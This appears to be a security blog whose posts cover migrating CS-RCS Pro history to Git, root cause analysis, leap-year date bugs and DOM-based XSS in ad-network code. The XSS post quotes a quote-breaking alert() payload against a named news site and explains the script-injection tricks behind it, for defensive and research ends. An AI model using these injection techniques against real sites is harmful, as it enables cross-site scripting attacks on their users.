Programmer Hubris

Got on with Git

In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.

[If you don’t want the back story, click here for the instructions!]

OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.

I picked one at random, and went looking for tools.

I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.

Why did you choose CS-RCS Pro?

A couple of really good reasons:

  • It works on Windows
  • It integrates moderately well with Visual Studio through the VSS functionality
  • It’s compatible with GNU RCS, which I had some familiarity with
  • It was free if you’re the only dev on your projects

But you know who doesn’t use CS-RCS Pro any more?

That’s right, ComponentSoftware.

It’s a dead platform, unsupported, unpatched, and belongs off my systems.

So why’s it still there?

One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:

  • Carry all my history, so that I can review earlier versions of the code (for instance, when someone says they’ve got a new bug that never happened in the old version, or when I find a regression, or when there’s a fix needed in one area of the code tree that I know I already made in a different area and just need to copy)
  • Lose all the history by starting fresh with the working copy of the source code

The second option seems a bit of a waste to me.

OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:

  • Of course the bug I’m looking through history for is going to be across the two source control packages
  • It would mean I still have CS-RCS Pro sitting around installed, unpatched and likely vulnerable, on one of my dev systems

So, really, I wanted to make sure that I could move my files, history and all.

What stopped you?

I really didn’t have a good way to do it.

Clearly, any version control system can be moved to any other version control system by the simple expedient of:

  • For each change X:
    • Set the system date to X’s date
    • Fetch the old source control’s files from X into the workspace
    • Commit changes to the new source control, with any comments from X
    • Next change

But, as you can imagine, that’s really long-winded and manual. That should be automatable.
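The loop above could be scripted roughly as follows. This is only a sketch, not a working “VSS2Git”: the `Change` record and `replay_plan` are hypothetical names, the step that fetches each change’s files from the old system is left out entirely, and instead of changing the system clock it assumes Git’s `GIT_AUTHOR_DATE` and `GIT_COMMITTER_DATE` environment variables, which is a swapped-in technique rather than the manual procedure described.

```python
from dataclasses import dataclass


@dataclass
class Change:
    """One historical check-in from the old system (hypothetical record)."""
    date: str      # ISO 8601, e.g. "2009-03-14T10:00:00"
    author: str    # e.g. "Kate Smith <kate@example.com>"
    comment: str


def replay_plan(changes):
    """Return (env, argv) pairs that would replay each change as a Git commit.

    Fetching the files for each change into the workspace depends on the
    old system, so it is deliberately not shown here.
    """
    plan = []
    # ISO 8601 strings sort chronologically, so oldest changes come first.
    for change in sorted(changes, key=lambda c: c.date):
        # Git reads these variables, so the system clock can stay untouched.
        env = {
            "GIT_AUTHOR_DATE": change.date,
            "GIT_COMMITTER_DATE": change.date,
        }
        plan.append((env, ["git", "add", "--all"]))
        plan.append((env, ["git", "commit", "--author", change.author,
                           "-m", change.comment]))
    return plan


if __name__ == "__main__":
    history = [
        Change("2010-01-02T09:30:00", "Kate Smith <kate@example.com>", "Fix bug"),
        Change("2009-03-14T10:00:00", "Kate Smith <kate@example.com>", "Initial"),
    ]
    for env, argv in replay_plan(history):
        print(env["GIT_AUTHOR_DATE"], " ".join(argv))
```

Each pair could then be handed to something like `subprocess.run(argv, env={**os.environ, **env})` once the files for that change are in place.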

In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.

There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.
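To give a feel for that format, here is a small sketch that builds one commit, containing one file, as a fast-import stream. The function name, file name, and timestamp are made up for illustration, and a real exporter such as rcs-fast-export emits far more than this (multiple files, branches, tags).

```python
def fast_import_commit(path, content, message, author, timestamp, mark=1):
    """Build a single-file commit in git fast-import stream format (bytes).

    `author` is "Name <email>"; `timestamp` is seconds since the epoch,
    written here with a fixed +0000 offset for simplicity.
    """
    body = content.encode("utf-8")
    msg = message.encode("utf-8")
    ident = f"{author} {timestamp} +0000".encode("utf-8")
    return b"".join([
        b"commit refs/heads/master\n",
        b"mark :%d\n" % mark,
        b"author " + ident + b"\n",
        b"committer " + ident + b"\n",
        # Each "data" command states the exact byte count that follows it.
        b"data %d\n" % len(msg), msg, b"\n",
        # "M <mode> inline <path>" means the file content follows directly.
        b"M 100644 inline " + path.encode("utf-8") + b"\n",
        b"data %d\n" % len(body), body, b"\n",
    ])


if __name__ == "__main__":
    stream = fast_import_commit(
        "hello.txt", "hi\n", "first",
        "Kate Smith <kate@example.com>", 1472256000)
    print(stream.decode("utf-8"))
```

Written to a file, output like this is the sort of thing “git fast-import” reads on its standard input.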

Nobody uses CS-RCS Pro

So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.

But… Remember I said that it’s compatible with GNU RCS.

And there’s scripts to go from GNU RCS to Git.

What you waiting for? Do it!

OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.

I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.

So why are you writing this?

Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.


Bash on Ubuntu on Windows.

It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.

With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.

Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?

Here’s the caveats

I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.

GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there’s no surprises. But…

CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.
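As a sketch of that layout, this is how I’d expect a working folder to map to its place under the repository root. The function name and example folders are hypothetical, and the lower-casing of the drive letter is an assumption based on my own tree; check what yours actually looks like.

```python
from pathlib import PureWindowsPath


def rcs_repo_path(repo_root, working_dir):
    """Guess where CS-RCS Pro keeps the archive tree for a working folder.

    Assumption: the drive letter appears as a lower-case folder (no ":")
    directly under the repository root, followed by the original tree.
    """
    work = PureWindowsPath(working_dir)
    drive = work.drive.rstrip(":").lower()
    # work.parts[0] is the drive root ("C:\\"); the rest is the folder tree.
    return PureWindowsPath(repo_root, drive, *work.parts[1:])


if __name__ == "__main__":
    print(rcs_repo_path(r"C:\RCS", r"C:\Projects\Tool"))
```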

Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.

Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.

Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.

This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.

Enough already, how do we do this?

Assumption: You have Windows 10.

  1. Install Windows 10 Anniversary Update – this is really easy, it’s an update, you’ve probably been offered it already, and you may even have installed it. This is how you’ll know you have it:
    [Screenshot omitted]
  2. Install Bash on Ubuntu on Windows – everyone else has written an article on how to do this, so here’s a link (I was going to link to the PC World article, but the full-page ad that popped up and obscured the screen, without letting me click the “no thanks” button persuaded me otherwise).
  3. Run the following commands in the bash shell:
    sudo apt-get update
    sudo apt-get install git
    sudo apt-get install ruby
  4. [Optional] Run “sudo apt-get install rcs”, if you want to use the GNU RCS toolset to play with your original source control tree. Not sure I’d recommend doing too much of that.
  5. Change directory in the bash shell to a new, blank workspace folder you can afford to mess around in.
  6. Now a long bash command, but this really simply downloads the file containing rcs-fast-export:
    curl http://git.oblomov.eu/rcs-fast-export/blob_plain/c8a2bd6edbb21c1bfaf269ad1ec0e82af72c911a:/rcs-fast-export.rb -o rcs-fast-export.rb
  7. Make it executable with the command “chmod +x rcs-fast-export.rb”
  8. Git uses email addresses, rather than owner names, and it insists on them having angle brackets. If your username in CS-RCS Pro was “bob”, and your email address is “kate@example.com”, create an authors file with a bash command like this:
    echo "bob=Kate Smith <kate@example.com>" > AuthorsFile
  9. Now do the actual creation of the file to be imported, with this bash command:
    ./rcs-fast-export.rb -A AuthorsFile /mnt/c/RCS/…path-to-project… > project-name.gitexport
    [Note a couple of things here – starting with “./”, because that isn’t automatically in the PATH in Linux. Your Windows files are logically mounted in drives under /mnt, so C:\RCS is in /mnt/c/RCS. Case is important. Your “…path-to-project…” probably starts with “c/”, so that’s going to look like “/mnt/c/RCS/c/…” which might look awkward, but is correct. Use TAB-completion on folder names to help you.]
  10. Read the errors and correct any interesting ones.
  11. Now import the file into Git. We’re going to initialise a Git repository in the “.git” folder under the current folder, import the file, reset the head, and finally check out all the files from the “master” branch into the current directory “.”. These are the bash commands to do this:
    git init
    git fast-import < project-name.gitexport
    git reset
    git checkout master .
  12. Profit!
  13. If you’re using Visual Studio and want to connect to this Git repository, remember that your Linux home directory sits under “%userprofile%\appdata\local\lxss\home”
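Two of the fiddlier details in those steps, the /mnt path and the authors file format, can be sketched in a few lines. The helper names are hypothetical; the drive mapping assumes the /mnt/<drive letter> layout described in step 9.

```python
from pathlib import PurePosixPath, PureWindowsPath


def to_wsl_path(windows_path):
    """Translate a Windows path such as C:\\RCS to its /mnt/c/RCS form."""
    p = PureWindowsPath(windows_path)
    drive = p.drive.rstrip(":").lower()
    # p.parts[0] is the drive root; everything after it keeps its case.
    return str(PurePosixPath("/mnt", drive, *p.parts[1:]))


def authors_line(rcs_user, full_name, email):
    """Format one authors-file entry: old user name, then name and <email>."""
    return f"{rcs_user}={full_name} <{email}>"


if __name__ == "__main__":
    print(to_wsl_path(r"C:\RCS"))
    print(authors_line("bob", "Kate Smith", "kate@example.com"))
```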

This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm -rf .git” to remove the new repository.

The blame game: It’s always never human error

The Ubuntu “Circle of Friends” logo.

Depending on the kind of company you work at, it’s either:

  • a group of three friends holding hands and dancing in a merry circle
  • a group of three colleagues each pointing at the other two to tell you who to blame
  • three guys tied to a pole desperately trying to escape the rising orange flood waters

If you work at the first place, reach out to me on LinkedIn – I know some people who might want to work with you.

If you’re at the third place, you should probably get out now. Whatever they’re paying you, or however much the stock might be worth come the IPO, it’s not worth the pain and suffering.

If you’re at the second place, congratulations – you’re at a regular, ordinary workplace that could do with a little better management.

What’s this to do with security?

A surprisingly great deal.

Whenever there’s a security incident, there should be an investigation as to its cause.

Clearly the cause is always human error. Machines don’t make mistakes, they act in predictable ways – even when they are acting randomly, they can be stochastically modeled, and errors taken into consideration. Your computer behaves like a predictable machine, but at various levels it actually routinely behaves like it’s rolling dice, and there are mechanisms in place to bias those random results towards the predictable answers you expect from it.

Humans, not so much.

Humans make all the mistakes. They choose to continue using parts that are likely to break, because they are past their supported lifecycle; they choose to implement only part of a security mechanism; they forget to finish implementing functionality; they fail to understand the problem at hand; etc, etc.

It always comes back to human error.

Or so you think

Occasionally I will experience these great flashes of inspiration from observing behaviour, and these flashes dramatically affect my way of doing things.

One such was when I attended the weekly incident review board meetings at my employer of the time – a health insurance company.

Once each incident had been resolved and addressed, they were submitted to the incident review board for discussion, so that the company could learn from the cause of the problem, and make sure similar problems were forestalled in future.

These weren’t just security incidents, they could be system outages, problems with power supplies, really anything that wasn’t quickly fixed as part of normal process.

But the principles I learned there apply just as well to security incidents.

Root cause analysis

The biggest principle I learned was “root cause analysis” – that you look beyond the immediate cause of a problem to find what actually caused it in the long view.

At other companies, who can’t bear to think that they didn’t invent absolutely everything, this is termed differently, for instance, “the five whys” (suggesting if you ask “why did that happen?” five times, you’ll get to the root cause). Other names are possible, but the majority of the English-speaking world knows it as “root cause analysis”.

This is where I learned that if you believe the answer is that a single human’s error caused the problem, you don’t have the root cause.

But!

Whenever I discuss this with friends, they always say “But! What about this example, or that?”

You should always ask those questions.

Here’s some possible individual causes, and some of their associated actual causes:

  • “Bob pulled the wrong lever” – Who trained Bob about the levers to pull? Was there documentation? Were the levers labeled? Did anyone assess Bob’s ability to identify the right lever to pull by testing him with scenarios?
  • “Kate was evil and did a bad thing” – Why was Kate allowed to have unsupervised access? Where was the monitoring? Did we hire Kate? Why didn’t the background check identify the evil?
  • “Jeremy told everyone the wrong information” – Was Jeremy given the right information? Why was Jeremy able to interpret the information from right to wrong? Should this information have been automatically communicated without going through a Jeremy? Was Jeremy trained in how to transmute information? Why did nobody receiving the information verify it?
  • “Grace left her laptop in a taxi” – Why does Grace have data that we care about losing – on her laptop? Can we disable the laptop remotely? Why does she even have a laptop? What is our general solution for people, who will be people, leaving laptops in a taxi?
  • “Jane wrote the algorithm with a bug in it” – Who reviews Jane’s code? Who tests the code? Is the test automated? Was Jane given adequate training and resources to write the algorithm in the first place? Is this her first time writing an algorithm – did she need help? Who hired Jane for that position – what process did they follow?

I could go on and on, and I usually do, but if you ever find yourself blaming an individual and saying “human error caused this fault”, it’s important to remember that humans, just like machines, are random and only stochastically predictable, and if you want to get predictable results, you have to have a framework that brings that randomness and unpredictability into some form of logical operation.

Many of the questions I asked above are also going to end up with the blame apparently being assigned to an individual – that’s just a sign that it needs to keep going until you find an organisational fix. Because if all you do is fix individuals, and you hire new individuals and lose old individuals, your organisation itself will never improve.

[Yes, for the pedants, your organisation is made up of individuals, and any organisational fix is embodied in those individuals – so blog about how the organisation can train individuals to make sure that organisational learning is passed on.]

Finally, if you’d like to not use Ubuntu as your “circle of blame” logo, there’s plenty of others out there – for instance, Microsoft Alumni:

Microsoft Alumni

On Widespread XSS in Ad Networks

Randy Westergren posted a really great piece entitled “Widespread XSS Vulnerabilities in Ad Network Code Affecting Top Tier Publishers, Retailers”.

Go read it – I’ll wait.

The article triggered a lot of thoughts that I’ll enumerate here:

This is not a new thing – and that’s bad

This was reported by SoftPedia as a “new attack”, but it’s really an old attack. This is just another way to execute DOM-based XSS.

That means that web sites are being attacked by old bugs, not because their own coding is bad, but because they choose to make money from advertising.

And because the advertising industry is just waaaay behind on securing their code, despite being effectively a widely-used framework across the web.

You’ve seen previously on my blog how I attacked Troy Hunt’s blog through his advertising provider, and he’s not the first, or by any means the last, “victim” of my occasional searches for flaws.

It’s often difficult to trace which ad provider is responsible for a piece of vulnerable code, and the hosting site may not realise the nature of their relationship and its impact on security. As a security researcher, it’s difficult to get traction on getting these vulnerabilities fixed.

Important note

I’m trying to get one ad provider right now to fix their code. I reported a bug to them, and they pointed out it was similar to the work Randy Westergren had written up.

So they are aware of the problem.

It’s over a month later, and the sites I pointed out to them as proofs of concept are still vulnerable.

Partly, this is because I couldn’t get a reliable repro as different ad providers loaded up, but it’s been two weeks since I sent them a reliable repro – which is still working.

Reported a month ago, reliable repro two weeks ago, and still vulnerable everywhere.

[If you’re defending a site and want to figure out which ad provider is at fault, inject a “debugger” statement into the payload, to have the debugger break at the line that’s causing a problem. You may need to do this by replacing “prompt()” or “alert()” with “(function(){debugger})()” – note that it’ll only break into the debugger if you have the debugger open at the time.]

How the “#” affects the URL as a whole

Randy’s attack example uses a symbol you won’t see at all in some web sites, but which you can’t get away from in others: the “#” symbol, also known as “hash” or “number”. [Don’t call it “pound”, please, that’s a different symbol altogether, “£”] Here’s his example:

http://nypost.com/#1'-alert(1)-'"-alert(1)-"

Different parts of the URL have different names. The “http:” part is the “protocol” (formally, the “scheme”), which tells the browser how to connect and what commands will likely work. “//nypost.com/” is the host part, and tells the browser where to connect to. Sometimes a port number is used – commonly, 80 or 443 – after the host name and a colon, but before the terminating “/” of the host element. Anything after the host part, and before a question-mark or hash sign, is the “path” – in Randy’s example, the path is just “/”, indicating he wants the root page. An optional “query” part follows the path, indicated by a question mark at its start, and running up to any “#” or the end of the URL. Finally, if a “#” character is encountered, this starts the “anchor” part (formally, the “fragment”), which is everything from after the “#” character on to the end of the URL.
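If you’d rather see the split than read about it, Python’s standard `urllib.parse.urlsplit` will take a URL apart for you. The `describe` helper and the example.com URL are mine, for illustration only; the dictionary keys use the names from the paragraph above rather than the library’s own.

```python
from urllib.parse import urlsplit


def describe(url):
    """Split a URL into the parts named in the text above."""
    parts = urlsplit(url)
    return {
        "protocol": parts.scheme,
        "host": parts.hostname,
        "port": parts.port,        # None when the URL does not state one
        "path": parts.path,
        "query": parts.query,
        "anchor": parts.fragment,  # everything after the "#"
    }


if __name__ == "__main__":
    print(describe("http://nypost.com/#1'-alert(1)-'\"-alert(1)-\""))
    print(describe("https://example.com:443/a/b?x=1#top"))
```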

The “anchor” has a couple of purposes, one by design, and one by evolution. The designed use is to tell the browser where to place the cursor – where to scroll to. I find this really handy if I want to draw someone’s attention to a particular place in an article, rather than have them read the whole story. [It can also be used to trigger an onfocus event handler in some browsers]

The second use is for communication between components on the page, or even on other pages loaded in frames.

The anchor tag is for the browser only

I want to emphasise this – and while Randy also mentioned it, I think many web site developers need to understand this when dealing with security.

The anchor tag is not sent to the server.

The anchor tag does not appear in your server’s logs.

WAFs cannot filter the anchor tag.

If your site is being attacked through abuse of the anchor tag, you not only can’t detect it ahead of time, you can’t do basic forensic work to find out useful things such as “when did the attack start”, “what sort of things was the attacker doing”, “how many attacks happened”, etc.

[Caveat: pedants will note that when browser code acts on the contents of the anchor tag, some of that action will go back to the server. That’s not the same as finding the bare URL in your log files.]
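A quick way to convince yourself of this is to build the request line a browser would send for a given URL. The sketch below is a simplification (a real browser sends headers too, and `request_line` is a made-up helper), but the point stands: nothing after the “#” makes it into the request.

```python
from urllib.parse import urlsplit


def request_line(url, method="GET"):
    """Return the HTTP/1.1 request line for a URL; the anchor is never sent."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    # parts.fragment is deliberately unused: it stays in the browser.
    return f"{method} {target} HTTP/1.1"


if __name__ == "__main__":
    print(request_line("http://nypost.com/#1'-alert(1)-'\"-alert(1)-\""))
```

That request line is what your server and WAF see, and it is the same one an entirely innocent visit to the front page would produce.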

If you have an XSS that can be triggered by code in an anchor tag, it is a “DOM-based XSS” flaw. This means that the exploit happens primarily (or only) in the user’s browser, and no filtering on the server side, or in the WAF (a traditional, but often unreliable, measure against XSS attacks), will protect you.

When trying out XSS attacks to find and fix them, you should try attacks in the anchor tag, in the query string, and in the path elements of the URL if at all possible, because they each will get parsed in different ways, and will demonstrate different bugs.

What does “-alert(1)-” even mean?

The construction Randy uses may seem a little odd:

"-alert(1)-"'-alert(1)-'

With some experience, you can look at this and note that it’s an attempt to inject JavaScript, not HTML, into a quoted string whose injection point doesn’t properly (or at all) escape quotes. The two different quote styles will escape from quoted strings inside double quotes and single quotes alike (I like to put the number ‘2’ in the alert that is escaped by the double quotes, so I know which quote is escaped).
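Here’s a sketch of what that looks like from the vulnerable code’s point of view. The `var tag = …` template is invented for illustration; real ad code differs, but the pattern of pasting an untrusted value between quotes is the same. The last function uses `json.dumps` as one way to produce a properly quoted JavaScript string literal; on its own it does not deal with a “</script>” inside the value.

```python
import json

# Randy's payload, with a "2" in the alert reached via the double quotes.
PAYLOAD = "1'-alert(1)-'\"-alert(2)-\""


def unsafe_single(value):
    """Paste the value into a single-quoted JavaScript string, unescaped."""
    return "var tag = '" + value + "';"


def unsafe_double(value):
    """Paste the value into a double-quoted JavaScript string, unescaped."""
    return 'var tag = "' + value + '";'


def safer(value):
    """Emit the value as one escaped JavaScript string literal."""
    return "var tag = " + json.dumps(value) + ";"


if __name__ == "__main__":
    print(unsafe_single(PAYLOAD))  # string - alert(1) - string
    print(unsafe_double(PAYLOAD))  # string - alert(2) - string
    print(safer(PAYLOAD))          # one string, quotes escaped
```

In both unsafe cases the generated line is still valid JavaScript, which is exactly why the payload carries both quote styles.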

But why use a minus sign?

Surely it’s invalid syntax?

While “string minus undefined” isn’t a meaningful operation (JavaScript quietly evaluates it to NaN rather than rejecting it), in order to apply the “minus” operator at all, it actually has to evaluate both arguments, and evaluating “alert(1)” means calling it. This is a usual side-effect of a dynamic language – in order to determine whether an operation is valid, its arguments have to be evaluated. Statically typed languages are usually able to identify specific types at compile time, and tell you when you have an invalid operand.

So, now that we know you can use any operator in there – minus, times, plus, divide, and, or, etc – why choose the minus? Here’s my reasoning: a plus sign in a URL is converted to a space. A divide (“/”) is often a path component and, like multiplication (“*”), is part of a comment sequence in JavaScript (“//” or “/*”). An “&” is often used to separate arguments in a query string. A “|” for “or” is possibly going to trigger different flaws such as command injection, and so is best saved for later.
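Two of those claims are easy to check with Python’s standard query-string handling, which follows the usual form-encoding rules. Whether a particular site decodes its input this way is an assumption; the parameter name `q` is made up.

```python
from urllib.parse import parse_qs, unquote_plus

if __name__ == "__main__":
    # A plus sign is decoded as a space, so the operator disappears.
    print(unquote_plus("1'+alert(1)+'"))
    print(parse_qs("q=1'+alert(1)+'"))

    # An ampersand ends the parameter, so most of the payload is cut off.
    print(parse_qs("q=1'&alert(1)&'"))

    # A minus sign survives untouched.
    print(parse_qs("q=1'-alert(1)-'"))
```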

Also, the minus sign is an unshifted character and quick to type.

There are so many other ways to exploit this – finishing the alert with a line-ending comment (“//” or “<!--”), using “prompt” or “confirm” instead of “alert”, using JavaScript obfuscators, etc, but this is a really good easy injection point.

Another JavaScript syntax abuse is simply to drop “</script>” in the middle of the JavaScript block and then start a new script block, or even just regular HTML. Remember that the HTML parser only hands off to the JavaScript parser once it has found a block between “<script …>” and “</script …>” tags. It doesn’t matter if the closing tag is “within” a JavaScript string, because the HTML parser doesn’t know JavaScript.
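You can watch an HTML parser do this with Python’s standard `html.parser`. It isn’t a browser, so treat this as an illustration of the principle rather than proof of any particular browser’s behaviour; the page fragment and the `TagLogger` class are made up.

```python
from html.parser import HTMLParser


class TagLogger(HTMLParser):
    """Record every start and end tag the HTML parser believes it saw."""

    def __init__(self):
        super().__init__()
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag))

    def handle_endtag(self, tag):
        self.events.append(("end", tag))


def tag_events(html):
    parser = TagLogger()
    parser.feed(html)
    parser.close()
    return parser.events


if __name__ == "__main__":
    # The closing tag sits "inside" what JavaScript would call a string.
    page = '<script>var s = "</script><img src=x onerror=alert(1)>";</script>'
    for event in tag_events(page):
        print(event)
```

The parser ends the script block at the first “</script>” and then treats the “img” as an ordinary tag, even though a JavaScript programmer would have read it as part of a string.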

There’s no single ad provider, and they’re almost all vulnerable

Part of the challenge in repeating these attacks, demonstrating them to others, etc, is that there’s no single ad provider, even on an individual web site.

Two visits to the same web site not only bring back different adverts, but they come through different pieces of code, injected in different ways.

If you don’t capture your successful attack, it may not be possible to reproduce it.

Similarly, if you don’t capture a malicious advert, it may not be possible to prove who provided it to you. I ran into this today with a “fake BSOD” malvert, which pretended to be describing a system error, and filled as much of my screen as it could with a large “alert” dialog, which kept returning immediately, whenever it was dismissed, and which invited me to call for “tech support” to fix my system. Sadly, I wasn’t tracing my every move, so I didn’t get a chance to discover how this ad was delivered, and could only rage at the company hosting the page.

This is one reason why I support ad-blockers

Clearly, ad providers need to improve their security. Until such time as they do so, a great protection is to use an ad-blocker. This may prevent you from seeing actual content at some sites, but you have to ask yourself if that content is worth the security risk of exposing yourself to adverts.

There is a valid argument to be made that ad blockers reduce the ability of content providers to make legitimate profit from their content.

But there is also a valid argument that ad blockers protect users from insecure adverts.

Defence – protect your customers from your ads

Finally, if you’re running a web site that makes its money from ads, you need to behave proactively to prevent your users from being targeted by rogue advertisers.

I’m sure you believe that you have a strong, trusting relationship with the ad providers you have running ads on your web site.

Don’t trust them. They are not a part of your dev team. They see your customers as livestock – product. Your goals are substantially different, and that means that you shouldn’t allow them to write code that runs in your web site’s security context.

What this means is that you should always embed those advertising providers inside an iframe of their own. If they give you code to run, and tell you it’s to create the iframe in which they’ll sit, put that code in an iframe you host on a domain outside your main domain. Because you don’t trust that code.

Why am I suggesting you do that? Because it’s the difference between allowing an advert attack to have limited control, and allowing it to have complete control, over your web site.

If I attack an ad in an iframe, I can modify the contents of the iframe, I can pop up a global alert, and I can send the user to a new page.

If I attack an ad – or its loading code – and it isn’t in an iframe, I can still do all that, but I can also modify the entire page, read secret cookies, insert my own cookies, interact with the user as if I am the site hosting the ad, etc.

If you won’t do it for your customers, at least defend your own page

[Screenshot omitted]

Here’s the front page of a major website with a short script running through an advert with a bug in it.

[I like the tag at the bottom left]

Insist on security clauses with all your ad providers

Add security clauses into your contracts, so that you can pull an ad provider immediately a security vulnerability is reported to you, and so that the ad providers are aware that you have an interest in the security and integrity of your page and your users. Ask for information on how they enforce security, and how they expect you to securely include them in your page.

[I am not a lawyer, so please talk with someone who is!]

We didn’t even talk about malverts yet

Malverts – malicious advertising – is the term for an attacker getting an ad provider to deliver their attack code to your users, by signing up to provide an ad. Often this is done using apparent advertising copy related to current advertising campaigns, and can look incredibly legitimate. Sometimes, the attack code will be delayed, or region-specific, so an ad provider can’t easily notice it when they review the campaign for inclusion in your web page.

Got a virus you want to distribute? Why write distribution code and try to trick a few people into running it, when for a few dollars, you can get an ad provider to distribute it for you to several thousand people on a popular web site for people who have money?

Leap Day again

I’ve mentioned before how much I love the vagaries of dates and times in computing, and I’m glad it’s not a part of my regular day-to-day work or hobby coding.

Here’s some of the things I expect to happen this year as a result of the leap year:

  • Hey, it’s February 29 – some programs, maybe even operating systems, will refuse to recognise the day and think it’s actually March 1. Good luck figuring out how to mesh that with other calendar activities. Or maybe you’ll be particularly unlucky, and the app/OS will break completely.
  • But the fun’s not over, as every day after February 29, until March 1 NEXT YEAR, you’re a full 366 days ahead of the same date last year. So, did you create a certificate that expires next year, last year? If so, I hope you have a reminder well ahead of time to renew the certificate, because otherwise, your certificate probably expires 365 days ahead, not one year. Or maybe it’ll just create an invalid certificate when you renew one today.
  • The same is true for calendar reminders – some reminders for “a year ahead” will be 365 days ahead, not one year. Programmers often can’t tell the difference between AddDays(365) and AddYears(1) – and why would they, when the latter is difficult to define unambiguously (add a year to today’s date, what do you get? February 28 or March 1?)
  • But the fun’s not over yet – we’ve still got December 31 to deal with. Why’s that odd? Normal years have a December 31, so that’s no problem, right? Uh, yeah, except that’s day 366. And that’s been known to cause developers a problem – see what it did to the Zune a few years back.
  • Finally, please don’t tell me I have an extra day and ask me what I’m going to do with it – the day, unless you got a day off, or are paid hourly, belongs to your employer, not to you – they have an extra day’s work from you this year, without adding to your salary at all.
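The “365 days” versus “one year” distinction, and the day-366 surprise, are easy to demonstrate. Python has no AddYears, so `add_one_year` below is my own sketch, and its choice of February 28 for a February 29 start is just one of the two defensible answers.

```python
from datetime import date, timedelta


def add_days_365(d):
    """What "a year from now" means to code that just adds 365 days."""
    return d + timedelta(days=365)


def add_one_year(d):
    """Same month and day next year; February 29 falls back to February 28."""
    try:
        return d.replace(year=d.year + 1)
    except ValueError:
        # Only February 29 can fail: next year has no such day.
        return d.replace(year=d.year + 1, day=28)


if __name__ == "__main__":
    issued = date(2015, 6, 1)
    print(add_days_365(issued))   # a day short of the anniversary
    print(add_one_year(issued))   # the anniversary itself
    print(add_one_year(date(2016, 2, 29)))
    # December 31 in a leap year is day 366, not day 365.
    print(date(2016, 12, 31).timetuple().tm_yday)
```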

And then there’s the ordinary issues with dates that programmers can’t understand – like the fact that there are more than 52 weeks in a year. “ASSERT(weeknum>0 && weeknum<53);”, anyone? 52 weeks is 364 days, and every year has more days than that. [Pedantic mathematical note – maybe this somewhat offsets the “employer’s extra day” item above]
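To see that assertion fail, count weeks either the naive way or the ISO 8601 way. The `naive_week` function is an assumption about how such code typically counts (seven-day blocks starting on January 1); the ISO figure comes straight from the standard library.

```python
from datetime import date


def naive_week(d):
    """Week number counted in seven-day blocks from January 1."""
    return (d.timetuple().tm_yday - 1) // 7 + 1


if __name__ == "__main__":
    # Day 365 of an ordinary year already lands in a 53rd week.
    print(naive_week(date(2017, 12, 31)))
    # ISO 8601 week numbering also has 53-week years.
    print(date(2015, 12, 31).isocalendar()[1])
```

Either way, “weeknum<53” is a bug waiting for the last day or so of the year.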

Happy Leap Day – and always remember to test your code in your head as well as in real life, to find its extreme input cases and associated behaviours. They’ll get tested anyway, but you don’t want it to be your users who find the bugs.

Why am I so cross?

There are many reasons why Information Security hasn’t had as big an impact as it deserves. Some are external – lack of funding, lack of concern, poor management, distractions from valuable tasks, etc, etc.

But the ones we inflict on ourselves are probably the most irritating. They make me really cross.

Why cross?

OK, “cross” is an English term for “angry”, or “irate”, but as with many other English words, it’s got a few other meanings as well.

It can mean to wrong someone, or go against them – “I can’t believe you crossed Fingers MacGee”.

It can mean to make the sign of a cross – “Did you just cross your fingers?”

It can mean a pair of items, intersecting one another – “I’m drinking at the sign of the Skull and Cross-bones”.

It can mean to breed two different subspecies into a third – “What do you get if you cross a mountaineer with a mosquito? Nothing, you can’t cross a scaler and a vector.”

Or it can mean to traverse something – “I don’t care what Darth Vader says, I always cross the road here”.

[Image: the Green Cross Man]

It’s this last sense that InfoSec people seem obsessed about, to the extent that every other attack seems to require it as its first word.

Such a cross-patch

These are just a list of the attacks at OWASP that begin with the word “Cross”.

Yesterday I had a meeting to discuss how to address three bugs found in a scan, and I swear I spent more than half the meeting trying to ensure that the PM and the Developer in the room were both discussing the same bug. [And here, I paraphrase]

“How long will it take you to fix the Cross-Frame Scripting bug?”

“We just told you, it’s going to take a couple of days.”

“No, that was for the Cross-Site Scripting bug. I’m talking about the Cross-Frame Scripting issue.”

